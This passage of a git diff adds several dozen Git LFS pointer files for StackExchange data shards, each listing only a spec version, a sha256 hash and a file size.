+version https://git-lfs.github.com/spec/v1 +oid sha256:33b0f77a8628e282acc4026a8c0cb4384ea8a319fe902cad8678603f99676d8d +size 43254771 diff --git a/data/stackexchange/1-1/871_2289.jsonl b/data/stackexchange/1-1/871_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..befa7f36840ab90e0b41ce8a1ecf6452b9309866 --- /dev/null +++ b/data/stackexchange/1-1/871_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e904061777057bd9966299e500185052359fc8fad60f5d6b6b2c501567eb937d +size 43355371 diff --git a/data/stackexchange/1-1/872_2289.jsonl b/data/stackexchange/1-1/872_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e69f3153e322649bce83b788f754faa4656511ac --- /dev/null +++ b/data/stackexchange/1-1/872_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b578907851b2118907cdea0aa64f06c9a6b82a7bd9fc5f6eec54f8b28d5a2d48 +size 43547381 diff --git a/data/stackexchange/1-1/873_2289.jsonl b/data/stackexchange/1-1/873_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b6d257a2dc5d9d6870b768d88dd17cad7a13608 --- /dev/null +++ b/data/stackexchange/1-1/873_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75086b349ca3163b374f129852f05c816346e0e3e2bfbce9537b8dc42e6c8e61 +size 43659063 diff --git a/data/stackexchange/1-1/874_2289.jsonl b/data/stackexchange/1-1/874_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..481956d3b7e742a1b0c6d2b486ff1dbed2fbd623 --- /dev/null +++ b/data/stackexchange/1-1/874_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee28b16522352e7dbb735757452bad0536ecfe2479ad55234add78adf58a9f92 +size 43134941 diff --git a/data/stackexchange/1-1/875_2289.jsonl b/data/stackexchange/1-1/875_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40ff07138a0829d9dbcebf0745f5ed87c65b0928 --- /dev/null +++ b/data/stackexchange/1-1/875_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4946e2689336b38544847c2250a7027a6cf25f620dec4684290f17924b53e9b +size 43025829 diff --git a/data/stackexchange/1-1/876_2289.jsonl b/data/stackexchange/1-1/876_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..4fbdc93917bf687f7a347892ad6f606b411f1a67 --- /dev/null +++ b/data/stackexchange/1-1/876_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:797f77da475b22255558a149233c06cdca05c51b6c85c6acf9ca6da2ea95da73 +size 43404819 diff --git a/data/stackexchange/1-1/877_2289.jsonl b/data/stackexchange/1-1/877_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad6d75fa73144d512a5124dc0dd68c34c5788877 --- /dev/null +++ b/data/stackexchange/1-1/877_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f2ee8643d2e88c081b3a43ce7f818510027f437b209f9b66180d632f4d275bf +size 42877113 diff --git a/data/stackexchange/1-1/878_2289.jsonl b/data/stackexchange/1-1/878_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d630eac166304c0b523525ed97938ecfc09752ac --- /dev/null +++ b/data/stackexchange/1-1/878_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48ec97990efab889874043c59a92d78bd8eafe295b73fc6f2b6175cf29fb46ce +size 43536131 diff --git a/data/stackexchange/1-1/879_2289.jsonl b/data/stackexchange/1-1/879_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e033357a1435789506a04d3af32cea139fd87f15 --- /dev/null +++ b/data/stackexchange/1-1/879_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fddc5d0aaca14d2a770a7ab0475a46e2e01b5796d9728cbffe48c331b013070 +size 43038589 diff --git a/data/stackexchange/1-1/87_2289.jsonl b/data/stackexchange/1-1/87_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ebd57d9dec90c7ad3a2216635f64911f8092410e --- /dev/null +++ b/data/stackexchange/1-1/87_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83c1c4e07e7539ff39135fcbea94cf27c0a30161ea385d8496fd079ff28f9a2d +size 38642618 diff --git a/data/stackexchange/1-1/880_2289.jsonl b/data/stackexchange/1-1/880_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d151595df8fa43bd8a3b8e63d8539d229b0df33 --- /dev/null +++ b/data/stackexchange/1-1/880_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2294463a18620994d276332e523b6af02bc7b10e4eaa2eeab04ae6332a08e5b5 +size 42470603 diff --git a/data/stackexchange/1-1/881_2289.jsonl b/data/stackexchange/1-1/881_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6dde8adffba0d69ce803539caf90e34f798c29e --- /dev/null +++ b/data/stackexchange/1-1/881_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5176e94186aea42163f0959f235d44ffd2f5582c145ceb911f2d4b6dcca7571 +size 43225294 diff --git a/data/stackexchange/1-1/882_2289.jsonl b/data/stackexchange/1-1/882_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..295820b05b43ede5cd92327db7966ec90f45aae8 --- /dev/null +++ b/data/stackexchange/1-1/882_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e107b27021b2818a77ec2b00700d1c6f19fa3b5ce3da5a8d7405405a0de2e4ff +size 43108556 diff --git a/data/stackexchange/1-1/883_2289.jsonl b/data/stackexchange/1-1/883_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ac1a7806ec6e130d6c47c103855100ca78a12a72 --- /dev/null +++ b/data/stackexchange/1-1/883_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:9a42f9acadd19709e321d237de2a6c1c4457bf7497eef12d92370469f0f1ef39 +size 43523061 diff --git a/data/stackexchange/1-1/884_2289.jsonl b/data/stackexchange/1-1/884_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5cb80002a8e6874556c75d8770ef77f47139ea0a --- /dev/null +++ b/data/stackexchange/1-1/884_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6795aee0ea7cad518c7cc4b223bc03ad73b0a6f59e8649d3e3e0b65bcb6d2eb +size 43778928 diff --git a/data/stackexchange/1-1/885_2289.jsonl b/data/stackexchange/1-1/885_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e4c7d8a15362d0113bd629fdfc6864a9effc68a --- /dev/null +++ b/data/stackexchange/1-1/885_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:deee3b4fa0e3e36c717052a449e6e642e178480b04d03769251b717182172ca1 +size 43511630 diff --git a/data/stackexchange/1-1/886_2289.jsonl b/data/stackexchange/1-1/886_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd0cb10a5c3f3144c0ca2f50c4102be7c092a614 --- /dev/null +++ b/data/stackexchange/1-1/886_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19022c9c63bc8c443644cafebe5eeb78707ea080f8c3407417b00673150c78a3 +size 44084343 diff --git a/data/stackexchange/1-1/887_2289.jsonl b/data/stackexchange/1-1/887_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d01ecc4ed1a8312c615973eaf2f07c326f61294c --- /dev/null +++ b/data/stackexchange/1-1/887_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21394eab0eeb195c784296e94b0971325c3da82a29bb7eb450a0ccf8796970eb +size 44011160 diff --git a/data/stackexchange/1-1/888_2289.jsonl b/data/stackexchange/1-1/888_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..437e9ec30a898d4ba89e581d978a96ae4912406d --- /dev/null +++ b/data/stackexchange/1-1/888_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e034bbb2d29a2d0ed753e8849becde834285090a1bfe0b994619a75c1dd4c06 +size 43639549 diff --git a/data/stackexchange/1-1/889_2289.jsonl b/data/stackexchange/1-1/889_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f0330534aa81ead4dd46b3e687507a34b3df173 --- /dev/null +++ b/data/stackexchange/1-1/889_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09327a9325f400bffe1d46737b7c62d6d180f278ee1c209b65c508ccda85b0a9 +size 43487844 diff --git a/data/stackexchange/1-1/88_2289.jsonl b/data/stackexchange/1-1/88_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11c89de5539ab6ac82e5f857bb6ebb5cdaf1b7cd --- /dev/null +++ b/data/stackexchange/1-1/88_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1cd578e671d43de64c52a1e29f79d361fac5d6be783cb3f96fe158131c7fc701 +size 39598070 diff --git a/data/stackexchange/1-1/890_2289.jsonl b/data/stackexchange/1-1/890_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75ab36bc6faab4e6ecfcf972836168f9ee0354da --- /dev/null +++ b/data/stackexchange/1-1/890_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:108cc2e3f2a0406f5e22c98cc973b862406797660a244a95863c72acd4736a34 +size 43719534 diff --git a/data/stackexchange/1-1/891_2289.jsonl b/data/stackexchange/1-1/891_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d7bc5b6bdec370c3f7893abbc8e3e7410fd01cae --- /dev/null +++ b/data/stackexchange/1-1/891_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffa03d3541557c2913035f2be7da538e51c56b1964362363268a1f8dc1569830 +size 43150964 diff --git a/data/stackexchange/1-1/892_2289.jsonl b/data/stackexchange/1-1/892_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0d3a65286958caa4b90927cbd4183acd92e6e3f --- /dev/null +++ b/data/stackexchange/1-1/892_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b07795b692128faaae3467d595d9293737540c34e22c19ca11e44a1fb01020e +size 43761809 diff --git a/data/stackexchange/1-1/893_2289.jsonl b/data/stackexchange/1-1/893_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..def9739448b078af064b6213880c431052366c19 --- /dev/null +++ b/data/stackexchange/1-1/893_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbdd77e1df52ac868eff34acac5a050e8067a3388413b8e98d06044245d4db24 +size 43798364 diff --git a/data/stackexchange/1-1/894_2289.jsonl b/data/stackexchange/1-1/894_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83ac8c8bebf20dc043e98f610e4b73fba986bf08 --- /dev/null +++ b/data/stackexchange/1-1/894_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89e707a157a91c10645a17e02681e1622aa78f5af383599ef6598bb134522d40 +size 43436227 diff --git a/data/stackexchange/1-1/895_2289.jsonl b/data/stackexchange/1-1/895_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4be97364abc332ff5923b69296bd863ce38b0182 --- /dev/null +++ b/data/stackexchange/1-1/895_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5f9a2fc7355d640ca7f36615fdcbe71cdbc3028fab00d6f3ff1b192fd413ea5 +size 43568370 diff --git a/data/stackexchange/1-1/896_2289.jsonl b/data/stackexchange/1-1/896_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba273f1ad81d0886c4632a886ce80cfcea9330fb --- /dev/null +++ b/data/stackexchange/1-1/896_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4932113000f2fd89ddaeaf61d8bbb63d52cc124973cc61d91e0672eac0252718 +size 42997934 diff --git a/data/stackexchange/1-1/897_2289.jsonl b/data/stackexchange/1-1/897_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc13d6bb1815be436b0897dbbed5e7c8e47e69ff --- /dev/null +++ b/data/stackexchange/1-1/897_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05f8f9d15916e52d9f1ddc1b6245939bbaebefeb84792d2e963109ae58dadbdf +size 43525259 diff --git a/data/stackexchange/1-1/898_2289.jsonl b/data/stackexchange/1-1/898_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3e8ad5a4c8725bf9f3d7713b99197ea6a1430e5 --- /dev/null +++ b/data/stackexchange/1-1/898_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:441cc17b0aa804c32a3595cce2b4b621f3be087f86a724618d23ab9918df286f +size 43605206 diff --git a/data/stackexchange/1-1/899_2289.jsonl b/data/stackexchange/1-1/899_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4486542979574807dfb289cff504d5ab0a54ae49 --- /dev/null +++ b/data/stackexchange/1-1/899_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:30830530e25d0c358f1b4d63e767441b1ded12f14b75e6cae75091df06612af9 +size 43123004 diff --git a/data/stackexchange/1-1/89_2289.jsonl b/data/stackexchange/1-1/89_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c688b295dad5ab00ce07ec7b40effa487576c8f --- /dev/null +++ b/data/stackexchange/1-1/89_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93a9e3cc8eeacdcac389fbd7da2f767453609ceedfb84af59bfb754013053318 +size 39253926 diff --git a/data/stackexchange/1-1/8_2289.jsonl b/data/stackexchange/1-1/8_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f5b0545b9f5cd2b4175be7578fd4d24e444d36d --- /dev/null +++ b/data/stackexchange/1-1/8_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a8d4a9457955dfb562a34d03691290a10e44e96be7f869c8e6bf60275ea2205 +size 35702822 diff --git a/data/stackexchange/1-1/900_2289.jsonl b/data/stackexchange/1-1/900_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..33c4538af30094ebc82ed1dc30a432e0b18231b3 --- /dev/null +++ b/data/stackexchange/1-1/900_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:074d32a9ae8a86fbaadf359153e54d3290dfa61192db7a0a951b6221e24bf091 +size 44128795 diff --git a/data/stackexchange/1-1/901_2289.jsonl b/data/stackexchange/1-1/901_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..928d922698dd45eba66db4b6ed043d01a4325709 --- /dev/null +++ b/data/stackexchange/1-1/901_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f3da2c108b07a291698536a777b0520f8e9d5b60d72de2acdb6b0dfb1f12c63 +size 44860390 diff --git a/data/stackexchange/1-1/902_2289.jsonl b/data/stackexchange/1-1/902_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ae4ee28cddfdeb49edab2dc42190e7bc8e787d7 --- /dev/null +++ b/data/stackexchange/1-1/902_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48a37a4db9afcfed477b3df1571df264b712e185cd7e2ccfb9c2b284cdbf2495 +size 44707356 diff --git a/data/stackexchange/1-1/903_2289.jsonl b/data/stackexchange/1-1/903_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b69dd25918dbabce9c5e7ec01da39e35ce539774 --- /dev/null +++ b/data/stackexchange/1-1/903_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:957ba2a3f5916ab88d737a9f1faad2fbbeb6da2892b0acdf1ba26dcab04a0f0e +size 44422011 diff --git a/data/stackexchange/1-1/904_2289.jsonl b/data/stackexchange/1-1/904_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..550ddab64896bb923f55c0ae2945e45945ea2c21 --- /dev/null +++ b/data/stackexchange/1-1/904_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3298d09e8614dfa050b50eda1700c52c154c596df256d7da57f596e2028e24f3 +size 44135550 diff --git a/data/stackexchange/1-1/905_2289.jsonl b/data/stackexchange/1-1/905_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f14587e8258e42346f330e904865b7f533d9ffb --- /dev/null +++ b/data/stackexchange/1-1/905_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1091f7c4557b8e6f46c4f228f9384b24fe3728e7d40b08cb5a742e90280b38b2 +size 44882832 diff --git a/data/stackexchange/1-1/906_2289.jsonl b/data/stackexchange/1-1/906_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..a0a79442ae45c01534efa851b8e5b8c11d6b0774 --- /dev/null +++ b/data/stackexchange/1-1/906_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:891262a022535f55b09e6de6db118922e26cdc98329cced0417ea931458fc820 +size 44790780 diff --git a/data/stackexchange/1-1/907_2289.jsonl b/data/stackexchange/1-1/907_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..efd260cff8ce5fbf49f9fd510fee5b1a7377ffc9 --- /dev/null +++ b/data/stackexchange/1-1/907_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f429e7408c73012d29df45f3e956cee2ef531532baab24d3caaa06a374d20e1b +size 44673190 diff --git a/data/stackexchange/1-1/908_2289.jsonl b/data/stackexchange/1-1/908_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91f44980b34dc650b85edbcb2e464ea1aa377bdb --- /dev/null +++ b/data/stackexchange/1-1/908_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0be2c70d33066ede2ffbbf2c7655cb303a2b31f8571a249c9136c6e27776810 +size 44861439 diff --git a/data/stackexchange/1-1/909_2289.jsonl b/data/stackexchange/1-1/909_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d00432c43a99795f59820e9cd67fe9f80645c703 --- /dev/null +++ b/data/stackexchange/1-1/909_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51f1717400e227ab2b485ca191fd922264ebe8710e3b0791eb1ff640cb0af890 +size 44364141 diff --git a/data/stackexchange/1-1/90_2289.jsonl b/data/stackexchange/1-1/90_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9994fabcbd113953d61d6a022729d1353841d61 --- /dev/null +++ b/data/stackexchange/1-1/90_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1bed1a8933c9472d4558f457c17c52cda7aa1b6eaaeb3eeb481a1167956be2f +size 39394673 diff --git a/data/stackexchange/1-1/910_2289.jsonl b/data/stackexchange/1-1/910_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..33fe589fbe024b627536f2431923f0ed84a1c473 --- /dev/null +++ b/data/stackexchange/1-1/910_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ba1027c0bbf32c518e1a9f4bf118cb92af190e4d3dbf46cbffb8ecaf20b7e82 +size 44337073 diff --git a/data/stackexchange/1-1/911_2289.jsonl b/data/stackexchange/1-1/911_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1945be3d7c01f5fbb445b53de8d75df4b41bc64d --- /dev/null +++ b/data/stackexchange/1-1/911_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8817fcef4f11942343c01f4809a8c36de71a9de19a786090a1ae2080dfd65e7e +size 44141621 diff --git a/data/stackexchange/1-1/912_2289.jsonl b/data/stackexchange/1-1/912_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..697fd95833cbe0015d07d7d843d5d9c9c6387b38 --- /dev/null +++ b/data/stackexchange/1-1/912_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b3b2ae53a969ab07f8aea7deb597a8278a908f1189e7b4faf1b60149beb10b3 +size 44198314 diff --git a/data/stackexchange/1-1/913_2289.jsonl b/data/stackexchange/1-1/913_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a0c1aeb7919f2fc03887245c086838ae32f5d42 --- /dev/null +++ b/data/stackexchange/1-1/913_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f8738e378e84b047dbf270ce09ffa70c0ab2e8c7b90038cc21b4d579c38da011 +size 44139885 diff --git a/data/stackexchange/1-1/914_2289.jsonl b/data/stackexchange/1-1/914_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbb97060021b5a32a96fc8474ddf21a9edf422f2 --- /dev/null +++ b/data/stackexchange/1-1/914_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41d8ee332de9dc55affee3eb75d53410b0eab8fe1ac4a5378dfd0c7dbcdab3bc +size 45475746 diff --git a/data/stackexchange/1-1/915_2289.jsonl b/data/stackexchange/1-1/915_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1682f8f4fa17c89cee69932317ceff1b9987238c --- /dev/null +++ b/data/stackexchange/1-1/915_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:492e840ed356d89183362e33ff3969d6036406f3bf98559cf88abafa0002ccb7 +size 44651925 diff --git a/data/stackexchange/1-1/916_2289.jsonl b/data/stackexchange/1-1/916_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fc3b384a0a4b64ebc160abb92b13553805ca47f --- /dev/null +++ b/data/stackexchange/1-1/916_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:decfb60bcfe5a10aa6db16932efdaefa39f1145024613cd274f7153a77320100 +size 44213589 diff --git a/data/stackexchange/1-1/917_2289.jsonl b/data/stackexchange/1-1/917_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58f504d18a5cdd8c9c0ae5bfd1bada59eb17928f --- /dev/null +++ b/data/stackexchange/1-1/917_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f08f3e66b7caddf48ac8b227a368cfa9a8383ed7872c63acc9178156002a70be +size 44588147 diff --git a/data/stackexchange/1-1/918_2289.jsonl b/data/stackexchange/1-1/918_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7877b6f0b4f5cf5f0f06989caa6ec81392f65b3f --- /dev/null +++ b/data/stackexchange/1-1/918_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3347bda235ab35d463548b0378f5e31111fb56bb88f7b2eb99c382563c7cc74 +size 44881231 diff --git a/data/stackexchange/1-1/919_2289.jsonl b/data/stackexchange/1-1/919_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ed114f808eab10485ef16f1b58268754b6dc964 --- /dev/null +++ b/data/stackexchange/1-1/919_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6730b23563158c5b81f010f769b4016b656fb6853c8b109296278a8e8013e20b +size 43723647 diff --git a/data/stackexchange/1-1/91_2289.jsonl b/data/stackexchange/1-1/91_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f13da1857e1efe951d635be470f0ec1b08cf3406 --- /dev/null +++ b/data/stackexchange/1-1/91_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb3350f6febe987cd4a52d6cbe11d9f0ae5c7bc9e8fcd10e329e1a2042912ef4 +size 39900383 diff --git a/data/stackexchange/1-1/920_2289.jsonl b/data/stackexchange/1-1/920_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd27f80332817316f95d3e99f08fb06fae420516 --- /dev/null +++ b/data/stackexchange/1-1/920_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c8b62c2092e454b8b98b588fee924847bc6eb57708e0badf1b7e17a5cc93de +size 43665058 diff --git a/data/stackexchange/1-1/921_2289.jsonl b/data/stackexchange/1-1/921_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..2046e852d3ef05269c788b84ed5b96251d4a7487 --- /dev/null +++ b/data/stackexchange/1-1/921_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c99f00a537e74d3316ca69b05ebd98f47b915c12583c3ea1d9fc8f796ee7350 +size 44778704 diff --git a/data/stackexchange/1-1/922_2289.jsonl b/data/stackexchange/1-1/922_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb88370a6c9f20700bf20e38bf128a8b4b4c43b4 --- /dev/null +++ b/data/stackexchange/1-1/922_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a806049e25b055be6b49d6f7f766995e235dceb7071600cfa686b6af57b85f8 +size 44669307 diff --git a/data/stackexchange/1-1/923_2289.jsonl b/data/stackexchange/1-1/923_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b511115325b3ca520492bc4abbe1c89e0eef2dd --- /dev/null +++ b/data/stackexchange/1-1/923_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4dcb989158ad44a6d04cc60187351771204cab932ad906fc61ccb4a019234573 +size 43385815 diff --git a/data/stackexchange/1-1/924_2289.jsonl b/data/stackexchange/1-1/924_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a3f3851c822dd76a20dc89f62869ef3be04f4ee9 --- /dev/null +++ b/data/stackexchange/1-1/924_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a64b1231ca8f8eeab98c9fc2660c0296e01aedbe110651b4a0743747e717bde2 +size 44323022 diff --git a/data/stackexchange/1-1/925_2289.jsonl b/data/stackexchange/1-1/925_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9162857a41a26d03f871b49a4ac8c2b3fcf8851c --- /dev/null +++ b/data/stackexchange/1-1/925_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:863772381d621b082cd6363d914976d0b5855a93842ba33fd245948df7920959 +size 44853555 diff --git a/data/stackexchange/1-1/926_2289.jsonl b/data/stackexchange/1-1/926_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab209817791b3622601247a6f3bd993097fd74b1 --- /dev/null +++ b/data/stackexchange/1-1/926_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2f8bed5b4fbf28180b2f68009a34b9a6a702625b3e3945e9c717b4c76067b74 +size 44595276 diff --git a/data/stackexchange/1-1/927_2289.jsonl b/data/stackexchange/1-1/927_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..673435b21b730b86545cc90ebe5262443bdf8d63 --- /dev/null +++ b/data/stackexchange/1-1/927_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9c12b5802ffd023a05f439953a941d115d8beefe2027afa385cfb36c39ce4a5 +size 44593442 diff --git a/data/stackexchange/1-1/928_2289.jsonl b/data/stackexchange/1-1/928_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3e512a7f0d35db2d25cb490697fd0a159307a83 --- /dev/null +++ b/data/stackexchange/1-1/928_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baeafd3c9eec49259099920687c6f8ac00f9898cf38b3352681bbf1af071f500 +size 45017484 diff --git a/data/stackexchange/1-1/929_2289.jsonl b/data/stackexchange/1-1/929_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d4b1ff6728bb0e69a89e18d51eacacf1cf7d2d02 --- /dev/null +++ b/data/stackexchange/1-1/929_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
